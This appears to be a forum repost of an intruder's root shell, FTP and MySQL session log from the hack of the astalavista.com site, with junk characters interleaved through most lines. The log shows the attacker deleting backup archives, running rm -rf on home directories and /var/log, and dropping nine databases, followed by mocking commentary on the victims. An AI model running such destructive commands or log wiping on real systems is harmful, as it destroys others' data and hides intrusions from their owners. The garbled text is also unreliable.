4 T5 U4 E0 \/ M. c* V6 |-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
# G7 Q2 v& N* S+ b' @-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2% L- B' E' K& b# y/ k
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
- A' b9 c& i7 m/ h) A-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar; ?+ a6 v$ X9 w; `" Q9 d, J! t( G
[snip]8 n" R( L$ E2 L9 a. j# D1 i3 e( L
226 Transfer complete.3 T6 w; v1 ~4 C- _# [9 C
ftp> mdelete *
; i: A$ f& }. t7 p3 D+ O. @ftp> ls -la8 _- E3 |$ Y4 C/ `5 a+ {9 ^% ]+ t
227 Entering Passive Mode (212,254,194,163,2,193)
: n( S3 d' y1 {150 Opening BINARY mode data connection for ‘file list’.
2 g* ^" v! M) G' x7 t6 j+ o; A e226 Transfer complete.* N/ K0 j, Y# |" e- h/ b" ?, N8 W+ g0 d
ftp>
/ c C% c9 j/ |! w
0 X% p" L$ _- y, k1 ?; E: \sh-3.2# cd /home7 h5 R! Y. |- R; X. T/ J
sh-3.2# ls -la
8 J, R5 Y8 i4 vtotal 1208 D! @- ~7 X$ P& {
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ." \- w2 k3 d2 R) N2 \) T+ ]7 V( o4 K
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..6 p5 V/ p1 E, B; X2 ?! S
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
$ k8 E4 B9 X, D7 [+ }4 O8 [-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
6 T# J1 n/ T+ p9 H5 ?% u-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
8 m: |. K5 h" u, j' X# Q/ p; ~drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
' _+ _1 K, e: P3 e( Q3 Xdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup# C! o/ l6 r% Q
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
3 }' a" `- [% u. S( K- k2 ^- }& Ldrwx–x–x 10 com com 4096 Apr 28 12:40 com W" ?& s* ]5 W
drwxr-xr-x 2 root root 4096 May 17 2007 ftp! c( ^: F/ C9 T% M: v9 d: e
drwx—— 3 jon jon 4096 Sep 21 2007 jon, t) ]3 s, k9 Z/ n4 u) `( W( {
drwx—— 2 root root 16384 Sep 11 2007 lost+found
6 P W9 i! F/ t9 z+ E ~drwxr-xr-x 2 root root 4096 Sep 14 2007 my" K( P6 E! ]. @1 k% u, B
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata. I, t4 F6 L) v$ e4 v) g0 ^9 t! k7 p& \
drwx—— 2 jon jon 4096 Sep 15 2007 test! `# @0 J- @# A4 |, g! S) C
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
! ` D- q% t. N/ p& [# y9 Z n+ s/ x- q, P8 v3 Z" l
sh-3.2# rm -rf backup/9 r3 N O- o E# w9 d8 x
sh-3.2# rm -rf backup.14161/
; {$ a$ A( k2 p# g+ Gsh-3.2# rm -rf ftp/
, {' Z7 z* }" U y, T5 D- P: }sh-3.2# rm -rf jon/
* a* \0 {; N Ish-3.2# rm -rf my/+ h$ X3 F, |( [8 x: k* n
sh-3.2# rm -rf mysqldata/
; l) u* o" i& ], A! L+ h' ish-3.2# rm -rf test/
9 G% r; i$ R- W+ @3 O5 ^sh-3.2# rm -rf tmp/
6 O# x# M' W1 ^- o4 _ \+ x5 T$ ]. h7 ksh-3.2# cd ~
" a$ ?& [) j, f1 S) @/ hsh-3.2# rm -rf *+ d) R, {5 k; s% g
sh-3.2# rm -rf /var/log/8 h; i$ ^6 D/ u5 A. H
rm: cannot remove directory `/var/log//proftpd’: Directory not empty' u7 D$ r- Z) c. b4 G) G
sh-3.2# rm -rf /home/*! m! ^$ T1 r( N f, C
sh-3.2# mysql
% {) X- X. V+ C$ k, A4 WWelcome to the MySQL monitor. Commands end with ; or \g. D1 E+ |( V" o1 F5 h3 M( b! y2 R
Your MySQL connection id is 407156
, ?5 O$ w& O) ~9 T, IServer version: 5.0.45-community-log MySQL Community Edition (GPL)9 Z: T+ x" S- Y. s
) J7 e! {" N3 v. ]9 a# DType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.$ f/ s6 R3 L! m6 h( F% \
. n4 l) c. {9 q$ u8 Q, y
mysql> show databases;
+ ^2 L7 U' j6 a2 H+———————–+
+ g" U$ a6 [* x7 H0 v$ x| Database |
( S7 K$ b) p; v; ~% a+———————–+- N: Q; P! J5 z* C
| information_schema |
2 B( K! b- z; R5 H2 X1 E| astanet_ads |
2 F, Z) Y+ i* A% @0 \| astanet_mailing_lists |* r- p% g8 `, Z8 `; ?7 i- C$ i
| astanet_mediawiki |* G8 z }( l3 w% T' T# d5 Q
| astanet_membersystem |# o$ `- i2 I$ h3 s/ e6 p
| com_contrexx |
5 P- g. H0 h B* j. j2 h/ F- k' j8 C| com_contrexx2 |
[: C. g8 X: J. K( U: e| com_contrexx2_live |" l+ R( M ^% G2 B; x
| da_roundcube |
2 C/ A& C6 D5 V/ n6 w2 u4 N| dolphin |
- A) x. q* S2 d| ideapool |
+ T. A7 a6 T2 S/ K; w| mysql |0 R3 N9 a: r' E) E4 `) ~
| test |
% E3 j" |4 U! M% J' q4 \6 }6 k! y6 Y| yourmaster |+ [0 w& w& G% R1 I
+———————–+
8 H' B' p, x. F9 ]' A+ s3 {% i14 rows in set (0.03 sec)
' |: L+ R' n U Q& D4 j# w' b5 L$ d% {( Q3 \' c$ Z8 F8 I
mysql> drop database astanet_membersystem;2 f$ I4 E# b7 B& H/ |4 _. g
droQuery OK, 46 rows affected (0.81 sec)
) I* x: l% F7 |: D
) ]" p# S8 z) q; fmysql> drop database com_contrexx;
) B2 M% @2 x6 V& R* ^, d: mQuery OK, 211 rows affected (2.72 sec)
* C& k/ y# E# W0 U& x! ?9 r$ v- S4 w& U. G. q
mysql> drop database com_contrexx2;
/ B) K* y! y/ L UQuery OK, 237 rows affected (2.23 sec)
5 R( c4 n0 l2 F# f. ]. A4 m. Q( ]0 X7 Y4 _9 H
mysql> drop database com_contrexx2_live;8 O5 v9 T: F% n5 O
Query OK, 227 rows affected (7.63 sec)' F7 f( c. l$ n. H
5 t: y. |& _: V; L; Z
mysql> drop database ideapool;: C7 z" a: s+ \! X6 k+ n
Query OK, 69 rows affected (0.19 sec)0 N& P$ [! |4 o# q' B
! m; P$ ? q( ?6 R6 S
mysql> drop database yourmaster;3 e+ K/ Q5 d/ |
Query OK, 158 rows affected (0.55 sec)
0 Y# i( f/ d" s: n& Y3 ?8 }5 c, Z# X8 u! T4 W
mysql> drop database astanet_ads;; |1 c/ ~6 M' D- l
Query OK, 9 rows affected (0.11 sec)) Z- {1 {; X; G' W) n: o
" G; q4 q# q- q5 N7 Omysql> drop database astanet_mailing_lists;, h# C: }- w5 E+ A- g' m9 ]' D/ b
Query OK, 24 rows affected (1.47 sec)! \; Y9 d; e7 f8 Q, l/ K( W0 ^
3 U5 q. F1 J# O3 Imysql> drop database astanet_mediawiki;
$ O+ w8 R: B, \ p9 G) bQuery OK, 31 rows affected (0.51 sec)( W8 r; x8 S$ L% j
: J+ t, p9 H& Gmysql> show databases;9 h! I. G+ \$ i- A6 L/ |5 H9 r5 q8 a
+——————–+1 ^7 o# b Y$ `9 r
| Database |
1 `; z3 P8 [0 Z; x& C1 }+——————–+; p- F. F' {6 E. |
| information_schema |# b9 }1 p. ~: m7 h2 V$ q' `
| da_roundcube |. E' J3 D& \# e
| dolphin |7 p; U: {+ ~. u: P4 t+ k
| mysql |$ f; R# A# P3 d: w+ Y
| test |
" H- R) [; c* ~8 K+——————–+
H4 G' s, w# j! H* t5 rows in set (0.00 sec)
+ G4 U4 e. j% h/ R) D3 G3 x6 t$ }
What a journey! We’re not sure exactly why the “Terminator” had any influence on
2 n# V. m' t+ |9 _% ]. ?1 atheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the
R+ v+ m/ Z, \. `wrong to say this pack of morons *wont be back*.
( n, Q6 k' p a |
发表于 2012-11-6 21:07:34
收藏
支持
反对